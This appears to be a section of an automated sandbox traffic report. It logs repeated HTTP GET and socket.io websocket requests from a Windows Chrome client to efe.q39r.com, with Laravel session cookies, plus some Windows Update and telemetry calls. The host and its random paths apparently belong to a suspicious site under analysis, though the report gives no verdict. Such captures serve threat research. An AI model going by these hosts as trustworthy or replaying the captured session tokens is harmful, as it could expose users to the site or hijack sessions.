XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef210 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef232 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T34126 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh78164 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl45140 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh254 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab175 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opkZKWoBXgK4XlaBoarjPDswkBdr2NIUBC8D3VyslijyXn8FWJLDbkTI32Kpccd196 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh254 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef232 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef210 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3DSec-WebSocket-Key: bcs4vSyRabcBE/1HxukJOA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9KOl2MdB5OHyWcF&MD=cOMbbLl7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3DSec-WebSocket-Key: g9kI22xxf0cCPk9QAAfzSA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
